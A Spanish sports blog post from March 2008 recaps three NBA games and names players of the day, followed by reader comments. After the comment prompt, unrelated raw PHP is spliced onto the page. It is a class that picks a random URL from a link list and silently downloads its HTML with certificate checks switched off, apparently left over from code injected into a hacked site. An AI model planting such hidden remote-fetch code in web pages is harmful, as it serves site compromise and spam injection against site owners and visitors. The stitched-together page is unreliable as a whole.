La crónica (06/03/08)

07 de March de 2008 por telekoman

Jornada reducida en espera de la avalancha de partidos del fin de semana. tan sólo 3, aunque todos ellos con lecturas muy interesantes. La derrota de Cleveland pese a una nueva exhibición de LeBron James a manos de unos Bulls que comienzan a creer que clasificarse para Playoffs es algo más que una utopía. La previsible victoria de los Spurs, y van 11 seguidas, que ya se han puesto en modo “demolición” y por último la constatación de que Houston y sus 17 victorias son para estar preocupados y de que los resultados de Dallas son también para estar preocupados.

 

Comenzamos con la crónica de la jornada:

LeBronVsGordonSe esperaba otra gran exhibición de LeBron James tras los 50 puntos y casi triple doble conseguido ayer en el Madison Square Garden. Los aficionados que acudieron al United Center de Chicago se quedaron con tan sólo una exhibición. LeBron se quedón en 39 puntos, 3 rebotes y 1 asistencia. Y eso que al descanso el marcador personal de James iba ya por 26 puntos. Chicago consiguió endurecer algo su defensa en la segunda parte y dejar a la estrella de Cleveland en sólo 11 puntos. En los Bulls, Gordon y Deng comandaron las operaciones anotando ambos 23 puntos y encabezando a los 6 jugadores de Chicago que anotaron más de 10 puntos. En esta aportación comunitaria está el secreto de la victoria de los Bulls, ya que en Cleveland, aparte de LeBron, sólo Devin Brown y Wally Szczerbiak superaron los 14 puntos dejando el marcador final en 96-107. Mención especial para Ben Wallace, ex Bull, que sólo consiguió anotar 2 puntos y aunque capturó 10 rebotes, fué totalmente superado GinobiliVsGrangerpor el pivot rookie de los Bulls, Noah, que se llevó 20 rebotes, 10 de ellos en ataque, y 13 puntos. Con la derrota, Cleveland deja la diferencia con Toronto por la cuarta plaza en un sólo partido. Chicago por su parte se queda también a sólo un partido de New Jersey en la lucha por la octava plaza del Este.

San Antonio ni siquiera necesitó de la aportación anotadora de Tim Duncan para derrotar a los Indiana Pacers por 97-108. El pivot tejano se limitó a conseguir 12 rebotes y 6 puntos en una mala serie de 3 de 11. En esta ocasión el liderazgo tejano vino de la mano de Manu Ginobili que anotó 28 puntos. Tan sólo fue necesario un esfuerzo adicional durante el tercer cuarto para distanciar al equipo de Indiana y reservar fuerzas para los próximos compromisos. La defensa de los Spurs y la mala selección de tiro de las estrellas de los Pacers hicieron todo el trabajo. Danny Granger lideró al equipo del Este en anotación con 22 puntos pero su selección de tiro fue pésima, consiguiendo tan sólo 9 de los 23 lanzamientos que intentó, incluyendo 0 de 6 en triples. Con esta victoria San Antonio iguala el número de victorias de los Lakers, manteniéndose al mando de la calsifición en el Oeste con una derrota menos que el equipo californiano.McGradyVsKidd

Tras los recientes y sonados trades de Pau Gasol, O’Neal o Kidd todo el mundo pensaba que entre estos tres equipos más los ommipresentes Spurs estaría el título del Oeste. Tras la baja de Yao Min, mucha gente dió totalmente por perdida la tempora de los Rockets. Ahora resulta que salvo milagro de San Antonio, la mejor racha de la temporada va a ser para los Rockets, apuntando muy alto en la clasificación final. Tras la victoria en el American Airlines Center de Dallas frente a unos Mavericks sin Dirk Nowitzki por un convincente 113-98, podemos asegurar que no todos los trades son buenos y que a veces mantenerse quieto también es avanzar. La baja del alemán por sanción tras su dura falta sobre Kirilenko en el partido frente a los Jazz, lastró claramente a los Mavericks, pero además faltó el paso adelante en anotación que se le supone a Jason Kidd. El gran base no realizó un buen partido y sólo anotó 7 puntos. Tuvo que ser Josh Howard quien mantuviera al equipo con 21 puntos. En los Rockets brillaron varios jugadores. McGrady obviamente, con 31 puntos, Rafer Alston con 24 puntos que son su mejor marca personal y Carl Landry con 17 puntos. Houston se sitúa a sólo a medio partido de New Orleans y a 2 partidos y medio de San Antonio en la lucha por el título de la División SouthWest. Dallas por su parte se acerca peligrosamente a la zona turbulenta de la última plaza del Oeste.

Vamos ahora con los jugadores de la jornada:

MVP: Festival anotador de Lebon James con 39 puntos, aunque esta vez se quedó muy atrás en el resto de apartados. Por su parte Tracy McGrady y Manu Ginobili acabaron con 31 puntos y 9 asistencias el primero y 28 puntos con 10 de 13 en tiros el segundo.

Rookie: Partidazo de Joakim Noah, que sigue aprovechando su titularidad en los Bulls. 13 puntos y 20 rebotes frente a su ex-compañero Ben Wallace. La venganza es una plato que se sirve frío. También hay que destacar a Carl Landry y Luis Scola llamados a cubrir la baja de Yao Ming en Houston.

Sorpresa: Buen partido de Matt Bonner aprovechando los minutos recibidos en el partido contra Indiana. También hay que destacar a Rafer Alston al que se le presupone más protagonismo en ausencia del pívot chino, Yao Ming.

Decepción: Dallas no acaba de despegar tras la llegada de Jason Kidd. Hoy, sin su referente, el alemán Dirk Nowitzky han caído contra los Rockets y Jason Kidd tan solo ha aportado 7 puntos, 6 asistencias y 6 rebotes.

Y os dejamos con las mejores jugadas:

 

Comenta

3 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Menudo nivel de los Rockets sin Yao, están jugando bastante bien y con las ideas muy claras.

    Chicago y Wizars si se recupera Arenas pueden ser cruces trampa en el Este.

      Citar

  2. Gallis dice:
    #2

    Si, como Arenas y Butler lleguen sanos a Playoffs, ojito, porque en un previsible cruce con Orlando podría pasar cualquier cosa. Chicago creo que acabará entrando, pero no les veo capaces de inquietar mucho a Boston o a Detroit.

    Y ya lo he dicho en el foro, pero si Houston sigue así, el MVP no es solo cosa de Kobe y Lebron.

      Citar

  3. Olafur dice:
    #3

    La verdad es que los Rockets van cogiendo automatismos y jugando de tiralineas, buena labor de Adelman, veremos si dura la cosa…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>